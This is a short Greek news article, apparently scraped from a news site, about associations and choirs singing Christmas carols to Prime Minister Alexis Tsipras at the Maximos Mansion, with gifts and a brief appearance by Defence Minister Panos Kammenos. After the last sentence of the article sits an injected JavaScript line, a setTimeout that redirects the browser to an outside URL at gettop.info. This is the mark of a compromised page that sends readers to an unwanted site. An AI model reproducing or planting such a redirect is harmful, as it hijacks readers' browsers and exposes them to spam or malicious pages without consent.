Έψαλαν τα κάλαντα στον Τσίπρα: Και του χρόνου να μας τα πείτε ξανά (ΒΙΝΤΕΟ)

0
7

 

Το κατώφλι του Μεγάρου Μαξίμου πέρασαν εκπρόσωποι συλλόγων για να ψάλουν τα κάλαντα στον πρωθυπουργό.

Αρχικά ο πρωθυπουργός Αλέξης Τσίπρας άκουσε τα κάλαντα από τον Σύλλογο Συνδρόμου Down Ελλάδος, με έδρα τη Θεσσαλονίκη. Καθώς ένα από τα παιδιά φορούσε κονκάρδα του ΠΑΟΚ ξεκίνησε αθλητική συζήτηση με τον πρωθυπουργό. Ο κ. Τσίπρας χάρισε στον Σύλλογο τεχνολογικό εξοπλισμό για να μπορούν να βλέπουν κινηματογράφο στα γραφεία ενώ δεσμεύθηκε να τα επισκεφθεί σύντομα.

Στη συνέχεια στο Μέγαρο Μαξίμου βρέθηκε η Πανηπειρωτική Συνομοσπονδία Ελλάδος και η χορωδία «Λαλητάδες», οι οποίοι και τραγούδησαν, μεταξύ άλλων, το δημοτικό τραγούδι για τα «περήφανα Τζουμέρκα», τον τόπο καταγωγής του πρωθυπουργού. Μάλιστα προσέφεραν στον κ. Τσίπρα τσίπουρο από την περιοχή, ηπειρώτικες πίτες αλλά και την ειδική έκδοση των ΕΛΤΑ για τη συμπλήρωση 100 χρόνων από την απελευθέρωση της Ηπείρου. Ο παριστάμενος υπουργός Εθνικής Άμυνας Πάνος Καμμένος σιγοτραγούδησε ένα δημοτικό τραγούδι ενώ ο πρωθυπουργός αποκάλυψε ότι τις πίτες που του χάρισαν τις έφτιαχνε η γιαγιά του.

Η γιορτινή ημέρα ολοκληρώθηκε με τη Μικτή Χορωδία Ενόπλων Δυνάμεων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here